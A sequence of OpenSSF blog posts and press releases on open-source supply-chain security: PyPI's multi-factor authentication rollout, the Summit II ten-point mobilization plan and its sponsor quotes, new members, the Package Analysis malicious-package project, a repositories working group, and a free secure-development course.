On July 8th, 2022, the Python Package Index (PyPI) announced a security key giveaway for maintainers of critical projects, where “critical” is a label given to the top 1% of packages on PyPI by download count during the prior six months. The giveaway included a statement of intent for PyPI to require multi-factor authentication (MFA) for maintainers of all critical projects “in the coming months.” This is similar to other efforts by GitHub, RubyGems, and npm to move to MFA. There was both commendation and concern for this effort.
We, the Open Source Security Foundation (OpenSSF), are a foundation working to improve the security of open source software (OSS). We’re comprised of organizations and individual OSS contributors from a variety of interests (including academic and commercial). We applaud these ongoing efforts because they help defend against the increasing attacks on OSS maintainers’ accounts that are occurring today.
Effort and concerns
The announcement from PyPI was met with mixed response. Since the announcement, many maintainers have enabled MFA for their accounts, required it for their projects, and taken advantage of the security key giveaway. Others raised valid concerns, such as the incomplete universality of the MFA requirement, as well as a trend of increasing requirements and expectations of maintainers to provide assurances around not only the quality and security of their open source, but also of who they are and how they code, for use of community infrastructure by open source maintainers.
There is a significant burden to repository operators in supporting MFA, particularly around support and account recovery. To that end, PyPI, like many others (notably npm and RubyGems), are following a phased rollout approach using a metric which enables the repository operators to control the support burden while providing a benefit to repository users.
Maintainer burden is also a legitimate concern. As OSS grows in popularity, maintainers are increasingly asked to support the software they created, in many cases being asked to go beyond what they signed up for (e.g., providing useful code “as is”). The OpenSSF advocates for automated tooling and encourages security measures which minimize maintainer burden wherever possible. When considering adding security features that require any additional effort (one-time or recurring) on the part of project maintainers, we advocate for implementing those features with extreme consideration to the maintainers. This is especially important because OSS normally does not come with guarantees (unless separately contracted) and consumers rarely pay maintainers. It is perfectly reasonable for maintainers to be concerned about potentially significant burdens, especially since they might perceive these efforts as some kind of unpaid, implicit guarantee to which they have not agreed to.
It is also worth noting that many repositories (including PyPI) are operated by OSS maintainers, and that account compromises present a significant burden on them and all other downstream users.
While no solution today is perfect, we strongly support PyPI’s efforts on their MFA rollout and hope the communities and maintainers will take advantage of this opportunity to lead the way in our first steps to more secure open source. In particular, PyPI organized a security key giveaway with sufficient supply to provide two keys (a primary and a backup) to each maintainer of critical packages. The security key implementation on PyPI uses the FIDO protocol, an existing standard. Furthermore, PyPI also supports using Time-based One-Time Password (TOTP) as an additional factor, which is widely available at zero cost in applications for all major operating systems, including several open source implementations. In short, they are taking steps to minimize maintainer burden as much as they can with technology currently available to the community.
The case for MFA
It’s important to understand that these moves towards MFA are not occurring in a vacuum. There are increasingly many cases where attackers are taking over open source developers’ accounts and leveraging control of those accounts to change project’s source code and/or deployed packages, with a potentially devastating impact on users.
Account compromise is the second most common supply chain attack (after typosquatting) on open source packages for dynamic programming languages like JavaScript, Python, and Ruby [“Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”]. Account takeover is a direct focus of many attackers; “eslint-scope,” a package with millions of weekly downloads in npm, was compromised to steal credentials from users of the package.
Maintainer account takeovers can be drastically reduced when the maintainers use MFA. That’s because attackers are typically taking over accounts by stealing or cracking passwords, or by doing “SIM swapping” attacks on smartphones. MFA with either TOTP or physical tokens blocks these attacks. This is more than hypothetical: Microsoft found that 99.9% attempts at account takeover of their services are prevented by MFA.
Movement towards MFA is underway
It’s important to understand that the movement towards MFAs is already underway; it’s not unique to PyPI:
Many other OSS-related services have not announced a requirement for MFA, but they do have support for MFA (and have had it for years in some cases).
Generally users of OSS expect that the software source code and packages came from its OSS developers, not from attackers who take over developer’s accounts. MFA is a mechanism to help preserve that assumption.
Support from the OpenSSF
At the OpenSSF, our mission is to improve the security of the open source ecosystem for all participants: developers, users, and the critical infrastructure that enables our communities to interact and share.
We fully support the efforts of software repository operators in improving the trustworthiness of content in their repositories to help project maintainers and users. We believe that software repositories should continue to make changes which enable all users to have confidence in the integrity of the repository’s contents and in the mapping from the upstream source code to the artifacts in the repository.
The OpenSSF is already actively supporting PyPI and other software repositories through activities like the Securing Software Repositories working group and sponsorship and funding from the Alpha/Omega project that facilitates the implementation of much needed security features while minimizing hardship on maintainers. If you’re interested in helping to secure OSS, please join us through participation in the Securing Software Repositories working group or other OpenSSF activities!
We’re excited to report the results of two security audits, one for Sigstore and one for slf4j. The goal of security audits is to find vulnerabilities so they can be…
Snyk has teamed up with the Linux Foundation to research and report on security concerns in the open source ecosystem. The 2022 State of Open Source Security report shows that…
We are excited to announce an initial release of Fuzz Introspector, a collaborative effort from OpenSSF members, that provides actionable insights for developers to identify fuzzing coverage blockers by analyzing…
10-Point Open Source and Software Supply Chain Security Mobilization Plan Released with Initial Pledges Surpassing $30M
WASHINGTON, DC – May 12, 2022 – The Linux Foundation and the Open Source Software Security Foundation (OpenSSF) brought together over 90 executives from 37 companies and government leaders from the NSC, ONCD, CISA, NIST, DOE, and OMB to reach a consensus on key actions to take to improve the resiliency and security of open source software.
Open Source Software Security Summit II, is a follow-up to the first Summit held January 13, 2022 that was led by the White House’s National Security Council. Today’s meeting was convened by the Linux Foundation and OpenSSF on the one year after the anniversary of President Biden’s Executive Order on Improving the Nation’s Cybersecurity.
The Linux Foundation and OpenSSF, with input provided from all sectors, delivered a first-of-its-kind plan to broadly address open source and software supply chain security. The Summit II plan outlines approximately $150M of funding over two years to rapidly advance well-vetted solutions to the ten major problems the plan identifies. The 10 streams of investment include concrete action steps for both more immediate improvements and building strong foundations for a more secure future.
A subset of participating organizations have come together to collectively pledge an initial tranche of funding towards implementation of the plan. Those companies are Amazon, Ericsson, Google, Intel, Microsoft, and VMWare, pledging over $30M. As the plan evolves further more funding will be identified, and work will begin as individual streams are agreed upon.
This builds on the existing investments that the OpenSSF community members make into open source software. An informal poll of our stakeholders indicates they spend over $110M and employ nearly a hundred full-time equivalent employees focused on nothing but securing the open source software landscape. This plan adds to those investments.
KEY QUOTES
Jim Zemlin – Executive Director, Linux Foundation: “On the one year anniversary of President Biden’s executive order, today we are here to respond with a plan that is actionable, because open source is a critical component of our national security and it is fundamental to billions of dollars being invested in software innovation today. We have a shared obligation to upgrade our collective cybersecurity resilience and improve trust in software itself. This plan represents our unified voice and our common call to action. The most important task ahead of us is leadership.”
Brian Behlendorf – Executive Director, Open Source Security Foundation (OpenSSF): “What we are doing here together is converging a set of ideas and principles of what is broken out there and what we can do to fix it. The plan we have put together represents the 10 flags in the ground as the base for getting started. We are eager to get further input and commitments that move us from plan to action.”
Anne Neurenberger, Deputy National Security Advisor, Cyber & Emerging Tech at National Security Council, The White House:
“President Biden signed the Executive Order on Cybersecurity last year to ensure the software our government relies on is secure and reliable, including software that runs our critical infrastructure. Earlier this year, the White House convened a meeting between government and industry participants to improve the security of Open Source software. The Open Source security foundation has followed up on the work at that meeting and convened participants from across industry to make substantial progress. We are appreciative of all participants’ work on this important issue.”
Atlassian
Adrian Ludwig, Chief Trust Officer
“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be participating in OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. We’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.”
Cisco
Eric Wenger, Senior Director, Technology Policy, Cisco Systems
“Open source software (OSS) is a foundational part of our modern computing infrastructure. As one of the largest users of and contributors to OSS, Cisco makes significant investments in time and resources to improve the security of widely-used OSS projects. Today’s effort shows the stakeholder community’s shared commitment to making open-source development more secure in ways that are measurable and repeatable.”
Dell
Jim Medica, Technologist in Dell Technologies’ Office of the CTO:
“Never before has software security been a more critical part of the global supply chain. Today, in a meeting led by Anne Neuberger [linkedin.com], Deputy National Security Advisor for Cyber and Emerging Technology, Dell and my Open Source Security Foundation colleagues committed our software security expertise to execute the Open Source Software Security Mobilization Plan. Dell’s best and brightest engineers will engage with peers to develop risk-based metrics and scoring dashboards, digital signature methodologies for code signing, and Software Bill of Materials (SBoM) tools – all to address the grand challenge of open source software security. This is an excellent example of the leadership Dell provides to proactively impact software security and open-source security solutions, and reinforces our commitment to the open source software community, to our supply chain and to our national security.”
Ericsson
Per Beming, Head of Standard and Industry Initiatives
“Ericsson is one of the leading promoters and supporters of the open source ecosystem, accelerating the adoption and industry alignment in a number of key technology areas. The Open Source Security Foundation (OpenSSF) is an industry-wide initiative with the backing of the Linux Foundation with the objective of improving supply chain security in the open source ecosystem.
“As a board member of OpenSSF, we are committed to open source security and we are fully supportive of the mobilization plan with the objective of improving supply chain security in the open source ecosystem. Being an advocate and adopter of global standards, the initiatives aim to strengthen open source security from a global perspective.”
“The security of open source is critical to the security of all software. Summit II has been an important next step in bringing the private and public sector together again and we look forward to continuing our partnerships to make a significant impact on the future of software security.”
Google
Eric Brewer, VP of Infrastructure at Google Cloud & Google Fellow
“We’re thankful to the Linux Foundation and OpenSSF for convening the community today to discuss the open source software security challenges we’re facing and how we can work together across the public and private sectors to address them. Google is committed to supporting many of the efforts we discussed today, including the creation of our new Open Source Maintenance Crew, a team of Google engineers who will work closely with upstream maintainers on improving the security of critical open source projects, and by providing support to the community through updates on key projects like SLSA, Scorecards; and Sigstore, which is now being used by the Kubernetes project. Security risks will continue to span all software companies and open source projects and only an industry-wide commitment involving a global community of developers, governments and businesses can make real progress. Google will continue to play our part to make an impact.”
IBM
Jamie Thomas, Enterprise Security Executive
“Today, we had the opportunity to share our IBM Policy Lab’s recommendations on how understanding the software supply chain is key to improving security. We believe that providing greater visibility in the software supply chain through SBoMs ( Software Bill of Materials) and using the Open Source Software community as a valuable resource to encourage passionate developers to create, hone their skills, and contribute to the public good can help strengthen our resiliency. It’s great to see the strong commitment from the community to work together to secure open source software. Security can always be strengthened and I would like to thank Anne Neuberger today for her deep commitment and open, constructive, technical dialogue that will help us pave the way to enhancing OSS security. ”
Intel
Greg Lavender, Chief Technology Officer and General Manager of the Software and Advanced Technology Group
“Intel has long played a key role in contributing to open source. I’m excited about our role in the future building towards Pat’s Open Ecosystem vision. As we endeavor to live into our core developer tenets of openness, choice and trust – software security is at the heart of creating the innovation platforms of tomorrow.”
Melissa Evers, Vice President, Software and Advanced Technology, General Manager of Strategy to Execution
“Intel commends the Linux Foundation in their work advancing open source security. Intel has a history of leadership and investment in open source software and secure computing: over the last five years, Intel has invested over $250M in advancing open-source software security. As we approach the next phase of Open Ecosystem initiatives, we intend to maintain and grow this commitment by double digit percentages continuing to invest in software security technologies, as well as advance improved security and remediation practices within the community and among those who consume software from the community.”
JFrog
Stephen Chin, Vice President of Developer Relations
“While open source has always been seen as a seed for modernization, the recent rise of software supply chain attacks has demonstrated we need a more hardened process for validating open-source repositories. As we say at JFrog, ‘with great software comes great responsibility’, and we take that job seriously. As a designated CNA, the JFrog Security Research team constantly monitors open-source software repositories for malicious packages that may lead to widespread software supply chain attacks and alerts the community accordingly. Building on that, JFrog is proud to collaborate with the Linux Foundation and other OpenSSF members on designing a set of technologies, processes, accreditations, and policies to help protect our nation’s critical infrastructure while nurturing one of the core principles of open source – innovation.”
JPMorgan Chase
Pat Opet, Chief Information Security Officer
“We are proud to have worked with Open Source Security Foundation (OpenSSF) and its members to create the new Open Source Software Security Mobilization Plan, This plan will help to address security issues in the software supply chain which is critical to making the world’s software safer and more secure for everyone.”
Microsoft
Mark Russinovich, CTO, Microsoft Azure
“Open source software is core to nearly every company’s technology strategy. Collaboration and investment across the open source ecosystem will strengthen and sustain security for everyone. Microsoft’s commitment to $5M in funding for OpenSSF supports critical cross-industry collaboration. We’re encouraged by the community, industry, and public sector collaboration at today’s summit and the benefit this will have to strengthen supply chain security.”
OWASP Foundation
Andrew van der Stock, Executive Director
“OWASP’s mission is to improve the state of software security around the world. We are contributing to the Developer Education and Certification, as well addressing the Executive Order for improving the state and adoption of SBOMs. In particular, we would like to see a single, consumable standard across the board.”
Mark Curphey (founder of OWASP) and John Viega (author of the first book on software security), Stream Coordinators
“We’re excited to see the industry’s willingness to come together on a single ‘bill of materials’ format. It has the potential to help the entire industry solve many important problems, including drastically improving response speed for when major new issues in open source software emerge.”
SAP
Tim McKnight, SAP Executive Vice President & Chief Information Security Officer
“SAP is proud to be a part of the Open Source Software Security Summit II and contribute to the important dialogue on the topic of Open Source software security.
“SAP is firmly committed to supporting the execution of the Open Source Software Security Mobilization Plan and we look forward to continuing our collaboration with our government, industry, and academic partners.”
Sonatype
Brian Fox, CTO of Sonatype and stewards of Maven Central.
“It’s rare to see vendors, competitors, government, and diverse open source ecosystems all come together like they have today. It shows how massive a problem we have to solve in securing open source, and highlights that no one entity can solve it alone. The Open Source Software Security Mobilization Plan is a great step toward bringing our community together with a number of key tactics, starting with securing OSS production, which will make the entire open source ecosystem stronger and safer.”
Wipro
Andrew Aitken, Global Head of Open Source
“Wipro is committed to helping ensure the safety of the software supply chain through its engagement with OpenSSF and other industry initiatives and is ideally suited to enhance efforts to provide innovative tooling, secure coding best practices and industry and government advocacy to improve vulnerability remediation.
“As the only global systems integrator in the OpenSSF ecosystem and in line with its support of OpenSSF objectives, Wipro will commit to training 100 of its cybersecurity experts to the level of trainer status in LF and OpenSSF secure coding best practices and to host training workshops with its premier global clients and their developer and cybersecurity teams.
“Further, Wipro will increase its public contributions to Sigstore and the SLSA framework by integrating them into its own solutions and building a community of 50+ contributors to these critical projects.”
KEY BACKGROUND
Three Goals of the 10-Point Plan
Securing Open Source Security Production
Make baseline secure software development education and certification the new normal for pro OSS developers
Establish a public, vendor-neutral, objective-metrics based risk assessment dashboard for the top 10,000 open source components.
Accelerate the adoption of digital signatures on software releases
Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
Improving Vulnerability Discovery and Remediation
Accelerate discovery of new vulnerabilities by maintainers and experts.
Establish the corps of “volunteer firefighter” security experts to assist open source projects during critical times.
Conduct third-party code reviews (and any necessary remediation work) of 200 of the most-critical open source software components yearly
Coordinate industry-wide data sharing to improve the research that helps determine the most critical open source software.
Shorten ecosystem Patching Response Time
Software Bill of Materials (SBOM) Everywhere – improve SBOM tooling and training to drive adoption
Enhance the 10 most critical open source security build systems, package managers, and distribute systems with better supply chain security tools and best practices.
The 10-Point Plan Summarized (available in full here)
Security Education Deliver baseline secure software development education and certification to all.
Risk Assessment Establish a public, vendor-neutral, objective-metrics-based risk assessment dashboard for the top 10,000 (or more) OSS components.
Digital Signatures Accelerate the adoption of digital signatures on software releases.
Memory Safety Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
Incident Response Establish the OpenSSF Open Source Security Incident Response Team, security experts who can step in to assist open source projects during critical times when responding to a vulnerability.
Better Scanning Accelerate discovery of new vulnerabilities by maintainers and experts through advanced security tools and expert guidance.
Code Audits Conduct third-party code reviews (and any necessary remediation work) of up to 200 of the most-critical OSS components once per year.
Data Sharing Coordinate industry-wide data sharing to improve the research that helps determine the most critical OSS components.
SBOMs Everywhere Improve SBOM tooling and training to drive adoption.
Improved Supply Chains Enhance the 10 most critical OSS build systems, package managers, and distribution systems with better supply chain security tools and best practices.
We’re pleased to share that Brian Behlendorf, OpenSSF General Manager, testified to the United States House of Representatives Committee on Science, Space, and Technology today. Brian’s testimony shares the work being done within the Open Source Security Foundation and broader open source software community to improve security and trustworthiness of open source software.
A copy of Brian’s written remarks are linked here.
SAN FRANCISCO, May 9, 2022 – The Open Source Security Foundation (OpenSSF) a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important software supply chain security initiatives, today announced 15 new members from leading software development, cybersecurity, financial services, communications, and academic sectors.
This round of commitments is led by two new premier members, Atlassian and Sonatype, who will join the OpenSSF governing board. New general member commitments come from Arnica, Bloomberg, Comcast, Cycode, F5, Futurewei Technologies, Legit Security, Sectrend, SUSE, and Tenable.
“We are thrilled to welcome Atlassian and Sonatype, two companies who play critical roles in modern software development and security, to the OpenSSF governing board”, Brian Behlendorf, General Manager at OpenSSF. “Open source software supply chain attacks threaten the very foundations of innovation that billions of people rely upon. Our 15 new members join a growing community of organizations, developers, researchers, and security professionals that are investing time and resources required to respond in this constantly evolving threat landscape.”
Open source software has become the foundation on which our digital economy is built. As noted in the Linux Foundation’s 2022 Software Bill of Materials (SBOM) and Cybersecurity Readiness report, 98% of organizations use open source regularly. The same study revealed that 72% of organizations are very or extremely concerned about software security. Recent vulnerabilities, such as the one impacting Log4j, have caused many organizations to prioritize software supply chain security and realize the need to be fully abreast of the open source ecosystem, as well as contributing to it. From governments to businesses, open source security has been brought to the top of the agenda as a priority issue to address and as a result, OpenSSF is seeing membership rise at a rapid pace.
The latest commitments follow a productive period for OpenSSF in which the foundation expanded its core working groups to include Securing Software Repositories. This group aims to improve cybersecurity practices where developers download open source packages most often.
Furthermore, on June 20th, the foundation will host a full day of sessions at OpenSSF Day. Presentations, delivered by working group leaders, will include subjects such as Best Practice Badges and Other Good Practices, Three Things Your Open Source Project Must Consider, and Securing Critical Projects. The day will conclude with a panel discussion on the Future of Securing Open Source Software. Registration and attendance are free for all those attending the Open Source Summit conference.
Premier Member Quotes
Atlassian
“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be joining OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. As a premier member, we’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.” – Adrian Ludwig, Chief Trust Officer, Atlassian
Sonatype
“As the maintainers of the largest repository of open source components in Maven Central, we have a unique view into how great the demand for open source has become in recent years. However, as that demand has grown, bad actors have recognized the power of open source and are seeking to use that against the industry. As these software supply chain attacks become more commonplace, open source developers have become the frontline of this battle. Our key mission at Sonatype is to help people understand their software supply chain, and harness all of the good that open source has to offer, without any of the risk. OpenSSF and its members share a similar vision. I’m excited to play a bigger role in OpenSSF as a board member and collectively work with other members to keep open source ecosystems safe and secure, as we all figure out how to battle both new and old attacks on the community.” – Brian Fox, CTO and Co-founder, Sonatype
General Member Quotes
Arnica
“Software supply chain attack vectors have consistently caught the security community off-guard. Based on Arnica’s research across all attacks since 2018, we found two consistent root causes. One, improper access management to source code and two, inability to detect abnormal behavior in the developer toolset. The journey to solve these gaps is long and we are working on perfecting each risk mitigation strategy one-by-one, starting with introducing the first-ever self-service access management for GitHub.” – Nir Valtman, Co-Founder and CEO, Arnica
Bloomberg
“We are incredibly excited to join the Open Source Security Foundation (OpenSSF), whose values of public good, openness and transparency, and diversity, inclusion, and representation, align with those of Bloomberg. As an ‘Open Source First’ organization, we greatly value open source and its use within the finance sector, and we are fully committed to helping secure the open source software supply chain, something we have invested in via an ongoing collaboration between our CTO Office and Engineering organization.” – Gavin McNay, Security Architect in Bloomberg’s CTO Office
Comcast
“Comcast is committed to open source software. We use it to build products, attract talent, and develop our technology to improve the customer experience. When it comes to open source security, everyone plays a role. We are thrilled to join OpenSSF with the global open-source community to see how we can continue to evolve to make open-source development even more secure.” – Shilla Saebi, Open Source Program Office Lead, Comcast Cable
F5
“The growth of open source usage has magnified the importance of advancing OSS supply chain security for all, which can only be achieved as a shared priority among the industry. At F5, we are committed to ensuring our customers’ apps are fast, available and secure in any environment. That is why we value the work of the Open Source Security Foundation and its participating members, and look forward to sharing our domain expertise to help advance this important work.” – Geng Lin, EVP and Chief Technology Officer, F5
Futurewei Technologies
“OpenSSF is a premier and leading organization on open source security. Futurewei is very excited to join OpenSSF, and to engage in the conversations on the important topics of open source security and sustainability. We look forward to exciting discussions and collaborations with OpenSSF.” – Chris Xie, Head of Open Source Strategy and Business Development
Legit Security
“Legit Security is pleased to join OpenSSF to advance the security of software supply chains within the open-source ecosystem as well as giving organizations tools to secure the infrastructure that makes up the SDLC – such as pipelines and systems. Attacks on software supply chains are estimated to increase between three to six times per year and are a global threat. We look forward to working with OpenSSF to publish security research and contribute tools and code for more secure software delivery and consumption across the entire community.” – Liav Caspi, CTO of Legit Security
Sectrend
“We feel very excited to be a part of this industry-leading Open Source Security foundation (OpenSSF). Together with other top-notch peers around the globe in various sectors under this initiative, we, Sectrend, are aiming to assist organizations of any size address the security and license compliance risks from open-source software. Securing the software supply chain is very critical for every company. Within the framework of OpenSSF or the Linux Foundation, Sectrend will make a tremendous contribution to this community-driven process in tooling, training, research, best practices, and consulting. Beyond Security, More than Open Source.” – Alex Xue, CEO, Sectrend
SUSE
“According to recent research in an Economist Impact survey, 95% of organizations are practicing open innovation, demonstrating how open source software is critical to business’s infrastructure and applications. With this comes the need for software to be secure and is why SUSE takes a proactive stance against security and compliance risks, leveraging tools for full lifecycle security including vulnerability management, CI/CD pipeline security, run-time security and government security certifications. SUSE is joining OpenSSF to further collaborate with the efforts to ensure the security of the open source software supply chain.” – Brent Schroeder, Head of SUSE’s Office of the CTO
Tenable
“We’re proud to be part of OpenSSF and join so many industry peers who understand the critical importance of securing open-source software and its associated supply chain. Log4j showed the world how pervasive OSS use is and how vulnerable it can be if the proper development and controls are not put in place to protect it. Tenable’s commitment to increasing visibility in attack surfaces includes shifting left to secure software development and helping organizations understand where the risks are throughout their systems.” –Glen Pendley, CTO, Tenable
The foundation also announced new Associate Members, including the Eclipse Foundation, China Academy of Information and Communications Technology (CAICT) and Chinese Academy of Sciences (ISCAS).
Read the OpenSSF and Harvard’s Census II Report, shedding light on the most commonly used FOSS packages at the application library level
About OpenSSF
Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all. For more information, please visit: https://openssf.org/
About the Linux Foundation
Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members and is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, ONAP, Node.js, Hyperledger, RISC-V, and more. The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit us at: linuxfoundation.org
By Caleb Brown and David A. Wheeler, on behalf of Securing Critical Projects Working Group
Today we’re pleased to announce the initial prototype version of the Package Analysis project, an OpenSSF project addressing the challenge of identifying malicious packages in popular open source repositories. In just one month of analysis, the project identified more than 200 malicious packages uploaded to PyPI and npm.
The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run? The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously. This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem. Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences.
The vast majority of the malicious packages we detected are dependency confusion and typosquatting attacks. The packages we found usually contain a simple script that runs during an install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior. Still, any one of these packages could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks.
There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of:
detecting differences in package behavior over time;
automating the processing of the Package Analysis results;
storing the packages themselves as they are processed for long-term analysis;
and improving the reliability of the pipeline.
Check out our GitHub Project and Milestones for more opportunities, and feel free to get involved on the OpenSSF Slack. This project is one of the efforts of the OpenSSF Securing Critical Projects Working Group. You can also explore other OpenSSF projects like SLSA and Sigstore, which expand beyond the security of packages themselves to address package integrity across the supply chain.
Authors: Dustin Ingram (Google), Jacques Chester (Shopify)
A software repository is a critical component of any open source ecosystem: it provides a trusted central channel to publish, store and distribute open-source third-party software to all consumers. Package indexes and package managers exist for almost every software ecosystem, and share many of the same goals, features and threats.
But these repositories and related tooling have been developed independently, with little knowledge sharing between them over the years. This means the same problems get solved repeatedly, mostly in isolation. As it becomes more important to increase the overall security of these critical repositories, it has also become important for these repositories to collaborate and share knowledge.
Today, we’re announcing the creation of the Securing Software Repositories Working Group, a community collaboration with a focus on the maintainers of software repositories, software registries, and tools (like package managers) that rely on them, at various levels including system, language, plugin, extensions and container systems.
We’ve brought together many of the key maintainers, contributors and stakeholders of software repositories that are critical to many open source ecosystems, including Java, Node.js, Ruby, Rust, PHP, and Python, to participate in the group.
This working group provides a forum to share experiences and to discuss shared problems, risks and threats. It also provides a collaborative environment for aligning on the introduction of new tools and technologies to strengthen and secure our respective software repositories, such as Sigstore.
You can learn more about the working group’s objectives in our repository and charter, join our meetings via the public OSSF calendar, or find us on the OpenSSF Slack in the #securing_software_repos channel. If you maintain or operate a software repository system of any kind, please join in!
Log4Shell, SolarWinds Compromise, Heartbleed – cybersecurity breaches have become household names in recent years. These issues are costing organizations billions of dollars in prevention and remediation costs, yet at the same time they are becoming ever more common. Reacting to breaches after the fact is useful, but not enough; such reactions fail to protect users in the first place. Security needs to instead be baked into software before it’s released. Unfortunately, most software developers don’t know how to do this.
To alleviate this issue and improve access to cybersecurity training for everyone from developers to operations teams to end users, the Open Source Security Foundation (OpenSSF) has partnered with Linux Foundation Training & Certification to release a new, free, online training course, Developing Secure Software. Those who complete the course and pass the final exam will earn a certificate of completion valid for two years.
Geared towards software developers, DevOps professionals, software engineers, web application developers, and others interested in learning how to develop secure software, this course focuses on practical steps that can be taken, even with limited resources, to improve information security. The goal is to make it easier to create and maintain systems that are much harder to successfully attack, reduce the damage when attacks are successful, and speed the response so that any latent vulnerabilities can be rapidly repaired.
This course starts by discussing the basics of cybersecurity, such as what risk management really means. It discusses how to consider security as part of the requirements of a system, and what potential security requirements you might consider. It then focuses on how to design software to be secure, including various secure design principles that will help you avoid bad designs and embrace good ones. It also considers how to secure your software supply chain, that is, how to more securely select and acquire reused software (including open source software) to enhance security.
The course also focuses on key implementation issues and practical steps that you can take to counter the most common kinds of attacks. Discussion follows on how to verify software for security, including various static and dynamic analysis approaches, as well as how to apply them (e.g., in a continuous integration pipeline). It also discusses more specialized topics, such as the basics of how to develop a threat model and how to apply various cryptographic capabilities. The course content mirrors that in the Secure Software Development program we offer with edX, but in a single course instead of three.
The self-paced course can be completed in about 14-18 hours and includes quizzes to test the knowledge gained. Upon completion, participants will receive a digital badge verifying that they have been successful in all required coursework and have learned the material. This digital badge can be added to resumes and social media profiles.
Enroll today to start improving your cybersecurity skills and practices!
